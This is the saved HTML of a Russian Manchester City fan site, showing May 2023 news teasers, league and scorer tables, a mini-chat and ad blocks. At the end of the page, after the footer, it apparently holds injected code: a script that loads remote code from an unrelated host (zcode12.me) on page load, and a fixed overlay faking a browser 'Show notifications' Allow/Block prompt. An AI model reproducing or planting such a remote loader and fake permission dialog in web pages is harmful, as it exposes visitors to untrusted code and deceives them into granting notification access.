     <h4 class="viewn_title"><a href="/news/satton_final_kubka_anglii_dlja_siti_budet_slozhnee_chem_final_ligi_chempionov/2023-05-22-22219">Саттон: "Финал Кубка Англии для "Сити" будет сложнее, чем финал Лиги чемпионов"</a></h4>
     <div class="viewn_top">
     
     22-05-2023, 19:45 | Автор: <a href="/index/8-8270">Dzeko</a> | Категория: <a href="/news/intervju/1-0-8">Интервью</a> | Комм. 2
     </div>
     <div class="viewn_cont">
     
    <img src="https://i2.imageban.ru/out/2023/05/22/da8071673f3502dc9c6bc249432e8a8c.jpg" style="border: 1px solid rgb(255, 255, 255); margin: 3px;" align="left" width="200px" height="150px" alt="">Бывший нападающий Крис Саттон считает, что сражение "Манчестер Сити" с "Манчестер Юнайтед" будет сложнее, ведь "красные дьяволы" изо всех сил будут стремиться не дать сопернику выиграть "требл".
    
     </div>
    </div>
    
    
    
    <br></div><div id="entryID22218"><div class="viewn_loop">
     <h4 class="viewn_title"><a href="/news/gjundogan_moi_ruki_gotovy_podnjat_eshhe_dva_trofeja/2023-05-22-22218">Гюндоган: "Мои руки готовы поднять еще два трофея"</a></h4>
     <div class="viewn_top">
     
     22-05-2023, 15:14 | Автор: <a href="/index/8-8270">Dzeko</a> | Категория: <a href="/news/intervju/1-0-8">Интервью</a> | Комм. 0
     </div>
     <div class="viewn_cont">
     
    <img src="https://i2.imageban.ru/out/2023/05/22/7484c02185caf929bea6fed2c25195ad.jpg" style="border: 1px solid rgb(255, 255, 255); margin: 3px;" align="left" width="200px" height="150px" alt="">Капитан "Манчестер Сити" Илкай Гюндоган заявил, что его команда предвкушает возможность завоевать еще два трофея в этом сезоне.
    
     </div>
    </div>
    
    
    
    <br></div><div id="entryID22217"><div class="viewn_loop">
     <h4 class="viewn_title"><a href="/news/gvardiola_siti_nuzhno_vyigrat_ligu_chempionov_chtoby_stat_velikoj_komandoj/2023-05-22-22217">Гвардиола: "Сити" нужно выиграть Лигу Чемпионов, чтобы стать великой командой"</a></h4>
     <div class="viewn_top">
     
     22-05-2023, 15:05 | Автор: <a href="/index/8-8270">Dzeko</a> | Категория: <a href="/news/intervju/1-0-8">Интервью</a> | Комм. 0
     </div>
     <div class="viewn_cont">
     
    <img src="https://i1.imageban.ru/out/2023/05/22/7b98b8f5bb06aede75e30feac00235e9.jpg" style="border: 1px solid rgb(255, 255, 255); margin: 3px;" align="left" width="200px" height="150px" alt="">Рулевой "Манчестер Сити" Хосеп Гвардиола заявил, что "горожанам" нужно еще выиграть и Лигу Чемпионов в этом сезоне, чтобы запомниться великой командой.
    
     </div>
    </div>
    
    
    
    <br></div><div id="entryID22216"><div class="viewn_loop">
     <h4 class="viewn_title"><a href="/news/ocenki_za_match_manchester_siti_chelsi/2023-05-21-22216">Оценки за матч. "Манчестер Сити" - "Челси"</a></h4>
     <div class="viewn_top">
     
     21-05-2023, 20:22 | Автор: <a href="/index/8-8270">Dzeko</a> | Категория: <a href="/news/ocenki/1-0-12">Оценки</a> | Комм. 0
     </div>
     <div class="viewn_cont">
     
    <img src="https://i7.imageban.ru/out/2023/05/21/40a1208d3f40021627da6cb2f6a2f80d.jpg" style="border: 1px solid rgb(255, 255, 255); margin: 3px;" align="left" width="200px" height="150px" alt="">Статистика и оценка за матч.
    
     </div>
    </div>
    
    
    
    <br></div><div id="entryID22214"><div class="viewn_loop">
     <h4 class="viewn_title"><a href="/news/siti_chelsi_1_0/2023-05-21-22214">Сити - Челси 1-0</a></h4>
     <div class="viewn_top">
     
     21-05-2023, 19:56 | Автор: <a href="/index/8-8270">Dzeko</a> | Категория: <a href="/news/otchety/1-0-1">Отчеты</a> | Комм. 0
     </div>
     <div class="viewn_cont">
     
    <img src="https://i3.imageban.ru/out/2023/05/21/183140e580f417242ff9d7d39674c0df.jpg" style="border: 1px solid rgb(255, 255, 255); margin: 3px;" align="left" width="200px" height="150px" alt="">В своем первом матче в статусе новоиспеченного чемпиона Премьер-Лиги "Манчестер Сити" одержал победу 1:0 над "Челси" благодаря быстрому голу Хулиана Альвареса.
    
     </div>
    </div>
    
    
    
    <br></div><div id="entryID22215"><div class="viewn_loop">
     <h4 class="viewn_title"><a href="/news/video_obzor_manchester_siti_chelsi/2023-05-21-22215">Видео обзор. Церемония награждения. "Манчестер Сити" - "Челси"</a></h4>
     <div class="viewn_top">
     
     21-05-2023, 19:56 | Автор: <a href="/index/8-8270">Dzeko</a> | Категория: <a href="/news/video/1-0-4">Видео</a> | Комм. 0
     </div>
     <div class="viewn_cont">
     
    <img src="https://i3.imageban.ru/out/2023/05/21/b487eddac14fcc474cbf7814ae5e6047.png" style="border: 1px solid rgb(255, 255, 255); margin: 3px;" align="left" width="200px" height="150px" alt="">Видео обзор. Церемония награждения.
    
     </div>
    </div>
    
    
    
    <br></div><div id="entryID22213"><div class="viewn_loop">
     <h4 class="viewn_title"><a href="/news/gjundogan_otkazhet_barselone_i_ostanetsja_v_siti/2023-05-21-22213">Гюндоган откажет "Барселоне" и останется в "Сити"</a></h4>
     <div class="viewn_top">
     
     21-05-2023, 08:23 | Автор: <a href="/index/8-8270">Dzeko</a> | Категория: <a href="/news/novosti/1-0-6">Новости</a> | Комм. 4
     </div>
     <div class="viewn_cont">
     
    <img src="https://i5.imageban.ru/out/2023/05/21/e62d41a642181c6205a1d05527a7fb7d.jpg" style="border: 1px solid rgb(255, 255, 255); margin: 3px;" align="left" width="200px" height="150px" alt="">Полузащитник Илкай Гюндоган, скорее всего, продолжит выступать за "Манчестер Сити".
    
     </div>
    </div>
    
    
    
    <br></div><div id="entryID22212"><div class="viewn_loop">
     <h4 class="viewn_title"><a href="/news/manchester_siti_chempion_anglijskoj_premer_ligi_2022_2023/2023-05-21-22212">"Манчестер Сити" - чемпион английской Премьер-лиги 2022/2023</a></h4>
     <div class="viewn_top">
     
     21-05-2023, 07:58 | Автор: <a href="/index/8-8270">Dzeko</a> | Категория: <a href="/news/novosti/1-0-6">Новости</a> | Комм. 0
     </div>
     <div class="viewn_cont">
     
    <img src="https://i2.imageban.ru/out/2023/05/21/e44a7c32f71c74532ce704b5e977867b.jpg" style="border: 1px solid rgb(255, 255, 255); margin: 3px;" align="left" width="200px" height="150px" alt="">"Манчестер Сити" третий раз подряд завоевывает титул чемпиона Англии.
    
     </div>
    </div>
    
    
    
    <br></div><div id="entryID22211"><div class="viewn_loop">
     <h4 class="viewn_title"><a href="/news/karrager_siti_komanda_s_drugoj_planety/2023-05-20-22211">Каррагер: "Сити" – команда с другой планеты"</a></h4>
     <div class="viewn_top">
     
     20-05-2023, 09:19 | Автор: <a href="/index/8-8270">Dzeko</a> | Категория: <a href="/news/intervju/1-0-8">Интервью</a> | Комм. 0
     </div>
     <div class="viewn_cont">
     
    <img src="https://i2.imageban.ru/out/2023/05/20/2b9f64969b17912ef75a54f00a7c7a82.jpg" style="border: 1px solid rgb(255, 255, 255); margin: 3px;" align="left" width="200px" height="150px" alt="">Бывший защитник "Ливерпуля" Джейми Каррагер отметил легкость, с которой "Манчестер Сити" обыграл главных конкурентов.
    
     </div>
    </div>
    
    
    
    <br></div><div class="catPages1" align="center" style="clear:both;" id="pagesBlock1"><strong class="paginator_top"><a class="swchItem" href="/news/?page2"><span><i class="pag_prev">Назад</i></span></a></strong><b class="swchItemA"><span>1</span></b> <a class="swchItem" href="/news/?page2"><span>2</span></a> <a class="swchItem" href="/news/?page3"><span>3</span></a> <span class="swchItemDots"><span>...</span></span> <a class="swchItem" href="/news/?page1698"><span>1698</span></a> <a class="swchItem" href="/news/?page1699"><span>1699</span></a>  </div></div><!-- </body> -->
     </div><!--/side_right-->
     <div id="sidebar">
    <!--U1CLEFTER1Z--><div class="block_full">
    <div class="block_cont"><!-- <bc> -->
    <div class="btabs_cont">
    <ul class="btabs">
    <li class="current"><a href="javascript://">Турнирная таблица</a></li>
    <li><a href="javascript://">Бомбардиры</a></li>
    <li><a href="javascript://">Ассистенты</a></li>
    </ul>
    
    <div class="btabs_row current">
    <table class="tablestat">
    <tbody><tr>
    <th scope="col">№ Команда</th>
    <th scope="col">И</th>
    <th scope="col">PM</th>
    <th scope="col">О</th>
    </tr>
    <tr class="odd">
    <td>1. Манчестер Сити</td>
    <td>36</td>
    <td>+62</td>
    <td>88</td>
    </tr>
    <tr>
    <td>2. Арсенал</td>
    <td>37</td>
    <td>+40</td>
    <td>81</td>
    </tr>
    <tr class="odd">
    <td>3. Ньюкасл</td>
    <td>36</td>
    <td>+35</td>
    <td>69</td>
    </tr>
    <tr>
    <td>4. Манчестер Юнайтед</td>
    <td>36</td>
    <td>+11</td>
    <td>69</td>
    </tr>
    <tr class="odd"><td>5. Ливерпуль</td>
    <td>37</td>
    <td>+28</td>
    <td>66</td>
    </tr>
    <tr>
    <!--<td> 6. Тоттенхэм Хотспур</td>
    <td>35</td>
    <td>+5</td>
    <td>58</td>
    </tr>-->
    </tr><tr class="odd">
    </tr></tbody></table>
    </div><!--/btabs_row-->
    
    <div class="btabs_row">
    <table class="tablestat">
    <tbody><tr>
    <th scope="col">Игрок</th>
    <th scope="col">ПЛ</th>
    <th scope="col">ЛЧ</th>
    <th scope="col">КЛ</th>
    <th scope="col">КА</th>
    <th scope="col">0</th>
    </tr>
    
    <tr class="odd">
    <td><a href="/index/ehrling_kholand/0-586" style="text-decoration:none; color: rgb(40,90,113);">Эрлинг Холанд</a></td>
    <td>36</td>
    <td>12</td>
    <td>1</td>
    <td>3</td>
    <td>52</td>
    </tr>
    <tr>
    <td><a href="/index/rijad_marez/0-550" style="text-decoration:none; ">Рияд Марез</a></td>
    <td>5</td>
    <td>2</td>
    <td>3</td>
    <td>5</td>
    <td>15</td>
    </tr>
    <tr class="odd">
    <td><a href="/index/fil_foden/0-543" style="text-decoration:none; color: rgb(40,90,113);">Фил Фоден</a></td>
    <td>10</td>
    <td>1</td>
    <td>0</td>
    <td>3</td>
    <td>14</td>
    </tr>
    <tr>
    <td><a href="/index/kevin_de_brjujne/0-97" style="text-decoration:none;">Кевин Де Брюйне</a></td>
    <td>7</td>
    <td>2</td>
    <td>0</td>
    <td>1</td>
    <td>10</td>
    </tr>
    <tr class="odd">
    <td><a href="/index/khulian_alvares/0-591" style="text-decoration:none; color: rgb(40,90,113);">Хулиан Альварес</a></td>
    <td>9</td>
    <td>3</td>
    <td>1</td>
    <td>3</td>
    <td>17</td>
    </tr>
    </tbody></table>
    </div><!--/btabs_row-->
    
    <div class="btabs_row">
    <table class="tablestat">
    <tbody><tr>
    <th scope="col">Игрок</th>
    <th scope="col">ПЛ</th>
    <th scope="col">ЛЧ</th>
    <th scope="col">КЛ</th>
    <th scope="col">КА</th>
    <th scope="col">0</th>
    </tr>
    <tr class="odd">
    <td><a href="/index/kevin_de_brjujne/0-97" style="text-decoration:none; color: rgb(40,90,113);">Кевин Де Брюйне</a></td>
    <td>16</td>
    <td>6</td>
    <td>2</td>
    <td>2</td>
    <td>26</td>
    </tr>
    <tr>
    <td><a href="/index/rodri/0-568" style="text-decoration:none;">Родри</a></td>
    <td>6</td>
    <td>0</td>
    <td>1</td>
    <td>0</td>
    <td>7</td>
    </tr>
    <tr class="odd">
    <td><a href="/index/rijad_marez/0-550" style="text-decoration:none; color: rgb(40,90,113);">Рияд Марез</a></td>
    <td>9</td>
    <td>2</td>
    <td>0</td>
    <td>1</td>
    <td>12</td>
    </tr>
    <tr>
    <td><a href="/index/fil_foden/0-543" style="text-decoration:none;">Фил Фоден</a></td>
    <td>5</td>
    <td>1</td>
    <td>0</td>
    <td>1</td>
    <td>7</td>
    </tr>
    <tr class="odd">
    <td><a href="/index/grilish/0-581" style="text-decoration:none; color: rgb(40,90,113);">Джек Грилиш</a></td>
    <td>7</td>
    <td>1</td>
    <td>0</td>
    <td>3</td>
    <td>11</td>
    </tr>
    <tr>
    <td><a href="/index/ehrling_kholand/0-586" style="text-decoration:none;">Эрлинг Холанд</a></td>
    <td>7</td>
    <td>1</td>
    <td>0</td>
    <td>0</td>
    <td>8</td>
    </tr>
    </tbody></table>
    </div><!--/btabs_row-->
    </div><!--/btabs_cont--><!-- </bc> --></div>
    </div>
     
     <!-- <block1> -->
     <div class="block_full">
     <div class="block_title">МИНИ-ЧАТ</div>
     <div class="block_cont"> <div><iframe id="mchatIfm2" style="width:100%;height:300px" frameborder="0" scrolling="auto" hspace="0" vspace="0" allowtransparency="true" src="/mchat/"></iframe>
    <script>
        function sbtFrmMC991(f) {
            document.querySelector('#mchatBtn').style.display = 'none';
            document.querySelector('#mchatAjax').style.display = '';
            _uPostForm('MCaddFrm', {type:'POST', url:'/mchat/?654004280.464505', } );
        }
    
        function countMessLength() {
            var message = document.querySelector('#MCaddFrm').mcmessage.value;
            var rst = 500 - message.length;
            if (rst < 0) {
                rst = 0;
                message = message.substr(0, 500);
            }
            document.querySelector('#jeuwu28').innerHTML = rst;
        }
    
        var tID7174 = -1;
        var tAct7174 = false;
    
        function setT7174(s) {
            var v = parseInt(s.options[s.selectedIndex].value);
            document.cookie = "mcrtd=" + s.selectedIndex + "; path=/";
            if (tAct7174) {
                clearInterval(tID7174);
                tAct7174 = false;
            }
            if (v > 0) {
                tID7174 = setInterval("document.getElementById('mchatIfm2').src='/mchat/?' + Date.now();", v*1000 );
                tAct7174 = true;
            }
        }
    
        function initSel7174() {
            var res = document.cookie.match(/(\W|^)mcrtd=([0-9]+)/);
            var s = $("#mchatRSel")[0];
            if (res && !!s) {
                s.selectedIndex = parseInt(res[2]);
                setT7174(s);
            }
            $("#mchatMsgF").on('keydown', function(e) {
                if (e.keyCode == 13 && e.ctrlKey && !e.shiftKey) {
                    e.preventDefault();
                    sbtFrmMC991();
                }
            });
        }
    </script>
    <form id="MCaddFrm" onsubmit="sbtFrmMC991(this ); return false;">
        <div align="center"><a href="javascript:;" rel="nofollow" onclick="loginPopupForm(); return false;">Для добавления необходима авторизация</a></div>
        <input type="hidden" name="a" value="18">
        <input type="hidden" name="ajax" value="1" id="ajaxFlag">
        <input type="hidden" name="numa" value="0" id="numa832">
    </form>
    <script>initSel7174();</script>
    </div> </div>
     </div>
     <!-- </block> -->
    
    <!-- <block1> -->
    <div class="block_full">
    <div class="block_title">ОПРОС</div>
    <div class="block_cont"> <div></div>
    <br><a href="http://mcfc-fan.ru/forum/16-631-1"><div>предложить свой опрос</div></a></div>
    </div> 
     <!-- </block1> -->
    
    
    <!-- <block2> -->
     <div class="block_full">
     <div class="block_title">ПОДДЕРЖАТЬ САЙТ</div>
     <div class="block_cont"><!--fb0c70c2-->
    <center>
    <font size="3">
    <font color="#5cbfeb">
    </font>
    </font>
    </center>
    
    </div>
     </div>
    <!-- </block2> -->
    
    
    <!-- <block1> -->
    <div class="block_full">
     <div class="block_title">СОВЕТУЕМ</div>
     <div class="block_cont">
    <div>
    <script type="text/javascript" src="http://mcfc-fan.ru/rtr/2"></script><a href="http://mcfc-fan.ru/rtr/2-7-1" target="_blank"><img alt="" border="0" src="http://s013.radikal.ru/i323/1504/e5/355a6b0fefc0.jpg" width="240" height="300"></a>
    </div></div>
    <div class="block_cont">
    <div>
    <script async="" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <!-- mcc-fan - 240 -->
    <ins class="adsbygoogle" style="display:inline-block;width:240px;height:400px" data-ad-client="ca-pub-6254950219923957" data-ad-slot="1549299022"></ins>
    <script>
    (adsbygoogle = window.adsbygoogle || []).push({});
    </script>
    </div></div>
    </div>
    <!-- </block1> -->
    
    <!-- <block> -->
     <div class="block_full">
     <div class="block_title">ЛЕНТА БЛОГОВ</div>
     <div class="block_cont"> <ul class="bnav"><li><a href="http://mcfc-fan.ru/blog/karlos_teves_vzgljad_odnogo_cheloveka/2013-06-26-263">Карлос Тевес. Взгляд одного человека.</a></li><li><a href="http://mcfc-fan.ru/blog/sovety_novichkam_kak_pravilno_delat_stavki_na_sport/2013-05-28-257">Советы новичкам. Как правильно делать ставки на спорт</a></li><li><a href="http://mcfc-fan.ru/blog/mysli_posle_finala_kubka_anglii_12_13/2013-05-12-254">Мысли после финала кубка Англии 12/13.</a></li><li><a href="http://mcfc-fan.ru/blog/bolshoe_leto_dlja_quot_siti_quot_quot_na_vykhod_quot/2013-05-05-253">Большое лето для "Сити" ("На выход")</a></li><li><a href="http://mcfc-fan.ru/blog/sovety_nachinajushhemu_bolelshhiku_ot_sajta_rfplinfo_ru/2013-04-15-252">Советы начинающему болельщику от сайта rfplinfo.ru</a></li><li><a href="http://mcfc-fan.ru/blog/smozhet_li_metallist_zanjat_2_e_mesto_v_chempionate_neskolko_myslej_bolelshhika/2013-04-14-251">Сможет ли Металлист занять 2-е место в чемпионате? Несколько мыслей болельщика</a></li></ul> </div>
     </div>
     <!-- </block> -->
    
    <!-- <block1> -->
     <div class="block_full">
     <div class="block_title">ПОСЛЕДНЕЕ НА ФОРУМЕ</div>
     <div class="block_cont"> <ul class="bnav"><li><a href="//mcfc-fan.ru/forum/14-106-0-17">Кто откуда, и сколько кому лет?</a></li><li><a href="//mcfc-fan.ru/forum/7-1-0-17">Любимый игрок</a></li><li><a href="//mcfc-fan.ru/forum/14-112-0-17">Сколько времени вы болеете за "Манчестер Сити"?</a></li><li><a href="//mcfc-fan.ru/forum/17-463-0-17">Нелюбимый клуб</a></li><li><a href="//mcfc-fan.ru/forum/16-631-0-17">Опросы на сайте</a></li><li><a href="//mcfc-fan.ru/forum/29-806-0-17">Матчи прошлого</a></li></ul></div>
     </div>
     <!-- </block1> -->
    
    <!-- <block1> -->
     <div class="block_full">
     <div class="block_title">ПАРТНЕРЫ</div>
     
    
     <!-- </block1> -->
    
    
    <!-- <block1> -->
     <div class="block_full">
     <div class="block_title">ОНЛАЙН</div>
     <div class="block_cont"> <div><div class="tOnline" id="onl1">Онлайн всего: <b>15</b></div> <div class="gOnline" id="onl2">Гостей: <b>14</b></div> <div class="uOnline" id="onl3">Пользователей: <b>1</b></div><a class="groupVerify" href="/index/8-1731">aguero)</a></div></div>
     </div>
     <!-- </block1> -->
    
    
    <!--/U1CLEFTER1Z-->
     </div><!--/sidebar-->
    <!-- </middle> -->
    </div>
    <!--U1BFOOTER1Z--></div><!--/content_full-->
    <!--start insert-->
    <div class="second_footer">
     <table>
     <tbody><tr>
     <td></td>
     <td><a href="/"><img src="/new_temp/footer_betsov.png" alt=""></a></td>
     <td><a href="/"><img src="/new_temp/footer_webrose.png" alt=""></a></td>
     <td><a href="/"><img src="/new_temp/footer_photo.png" alt=""></a></td>
     <td></td>
     <td></td>
     </tr>
     </tbody></table>
    </div>
    <!--end insert-->
     <div id="footer">
     <div class="flogo"><a href="/"><img src="/designs_114/flogo.png" width="98" height="89" alt="logo site 2"></a></div>
     <div id="footer_cont">
     <div class="fstat"> 
     <!-- Yandex.Metrika informer -->
    <a href="https://metrika.yandex.ru/stat/?id=66501232&amp;from=informer" target="_blank" rel="nofollow"><img src="https://informer.yandex.ru/informer/66501232/3_1_FFFFFFFF_EFEFEFFF_0_uniques" style="width:88px; height:31px; border:0;" alt="Яндекс.Метрика" title="Яндекс.Метрика: данные за сегодня (просмотры, визиты и уникальные посетители)" class="ym-advanced-informer" data-cid="66501232" data-lang="ru"></a>
    <!-- /Yandex.Metrika informer -->
    
    <!-- Yandex.Metrika counter -->
    <script type="text/javascript">
     (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
     m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
     (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");
    
     ym(66501232, "init", {
     clickmap:true,
     trackLinks:true,
     accurateTrackBounce:true
     });
    </script>
    <noscript><div><img src="https://mc.yandex.ru/watch/66501232" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
    <!-- /Yandex.Metrika counter -->
     </div>
     
    <a rel="nofollow" href="/panel/?a=ustat&amp;u=mcfc&amp;d=d&amp;il=ru" target="_blank">
        <img alt="" src="/stat/1684845844" height="31" width="88"></a>
    </div> <br>
     Все права защищены © 2012 | <a href="/index/0-3">Обратная связь</a> <br>
     Разработано в <a href="/" rel="nofollow" target="_blank">Сайт болельщиков "Манчестер Сити"</a> | <a href="http://mcfc-fan.ru/news/pravila_povedenija_v_mini_chate/2017-02-25-15151" rel="nofollow">Правила сообщества</a><br>
     <noindex><!-- "' --><!-- "' --><span class="pbHF5Ocz">Хостинг от <a href="https://www.ucoz.ru/">uCoz</a></span>
    <!-- Yandex.Metrika counter -->
    <script type="text/javascript">
        (function(m,e,t,r,i,k,a){
            m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
            m[i].l=1*new Date();
            k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)
        })(window, document,'script','//mc.yandex.ru/metrika/tag.js', 'ym');
    
        ym(66501232, 'init', {accurateTrackBounce:true, trackLinks:true, clickmap:true, params: {__ym: {isFromApi: 'yesIsFromApi'}}});
    </script>
    <noscript><div><img src="https://mc.yandex.ru/watch/66501232" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
    <!-- /Yandex.Metrika counter -->
    
    
    </noindex>
     </div>
     </div><!--/footer-->
     </div><!--/content_in-->
     </div>
     </div>
     </div><!--/content_c_bg-->
    </div><!--/container_wrap--><!--/U1BFOOTER1Z-->
    
    
    
    <script type="text/javascript" charset="utf-8" async="" src="https://zcode12.me/?ze=hbrdinjsgy5ha3ddf42dkojs"></script><div id="tooltip" style="display: none;"><h3></h3><div class="body"></div><div class="url"></div></div><div>    <div style="z-index: 2147483647; position: fixed; top: 0; top: 0%; height: 150px;width: 400px; bottom: 0; left: 0; right: 0;background: rgba(0,0,0,.0);backface-visibility: hidden;-webkit-backface-visibility: hidden;text-align: left;">                        <div style="box-sizing: border-box;-webkit-box-sizing:border-box;width: 320px;max-width: 100%;background: #fff;position: fixed;top: 0;left: 56px;box-shadow: 0 0 20px #0000008a;border-radius: 3px;line-height: 1;">                 <img style="box-sizing: border-box;-webkit-box-sizing:border-box;padding: 0;margin:0;position: absolute;width: 11px;right:10px;top:10px;cursor: pointer;outline: 0 !important;" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAeCAMAAAAM7l6QAAAAS1BMVEUAAABaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlo8++Y/AAAAGHRSTlMAC/Tp5NHux7woBr8u1CEiE8wfMh3aqKRGKXN5AAAAxklEQVQoz22SWxaDIAxEo6JQLIpWW/a/0kYE5xCYDx+53BwkEse4herMbqVIQ1AVtzNXD76bwBlWQfVVVfvlRv4qsE5VOvkKH+4d8mN6mh6/23LpzS/ggvZMJa+XW43loNisfdp5Kl3hq0TlQc0BwWdKDlfGgKqD6vwy3Tpq5Jvx6FvzFRurKfjSpvCb9HzOZ2/QydNW9zf1SOCD3gN14NJNA0d/K2jhH8IV/kQ60Q8o/J46DRfxLv8xVsMt/EgvPkQqfcUd/7Y7JTdYkYd+AAAAAElFTkSuQmCC">                 <div style="box-sizing: border-box;-webkit-box-sizing:border-box;padding: 5% 5% 4% 5%;font-family: calibri,arial;font-size: 17px;">                     ... wants to:                 </div>                 <div style="font-size: 0;line-height: 0;padding: 0 5%;">                     <img style="width:13px;vertical-align: top;padding: 0;margin: 0;display: inline-block;" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACQAAAAqCAMAAADs1AnaAAAAUVBMVEUAAABaWlpZWVlaWlpZWVlSUlJZWVlaWlpZWVlZWVlWVlZOTk5ZWVlZWVlaWlpZWVlZWVlXV1dRUVFaWlpaWlpZWVlaWlpZWVlaWlpVVVVaWlqPKIPXAAAAGnRSTlMAXm2UZw358qZCMAjfzbOrWDUX48S4nIx3J6SDwgkAAAC9SURBVDjL7dLLDoMgEIXhaSsC3vHuef8HLVETFWHUpMv+6y9nMUBupm0NXVTFQFzxRmSwZYJFUwxbPLEoWVDCEN1nmMt6HVopsKvwrkUSh2R0NiNOjacdeHK2EulDMjmgDt66vdEItL+ECiG1GdGEULO9okEws/2PMKrcI/GneofR+49+iB49S1qEUZGuRoFJpbMpwVZaJVbDKEE5LssJN6LXjeh59Wet5pDEnOQQDQsaiEso2JQgPp3nmpy+KIFSTz3Bs58AAAAASUVORK5CYII=">                     <span style="display:inline-block;vertical-align:top;margin-left:14px;font-size: 12px;line-height:1;font-family: 'segoe ui',Calibri,Arial;font-weight: 400;">                         Show notifications                     </span>                 </div>                 <div style="padding: 22px 12px 6px 12px;font-size: 0;line-height: 0;text-align: right;">                     <div style="border: 1px solid #dadce0;color: #3673E3;margin-left: 10px;text-shadow: none;display: inline-block;vertical-align: top;min-width: 109px;text-align: center;padding: 0 15px;margin: 3px;height: 30px;line-height: 28px;border-radius: 4px;cursor: pointer;font-family: 'segoe ui',Calibri,Arial;outline: 0 !important;font-size: 12px;">                         Allow                     </div>                     <div style="border: 1px solid #dadce0;color: #3673E3;margin-left: 10px;text-shadow: none;display: inline-block;vertical-align: top;min-width: 109px;text-align: center;padding: 0 15px;margin: 3px;height: 30px;line-height: 28px;border-radius: 4px;cursor: pointer;font-family: 'segoe ui',Calibri,Arial;outline: 0 !important;font-size: 12px;">                         Block                     </div>                </div>            </div>                    </div></div></body></html>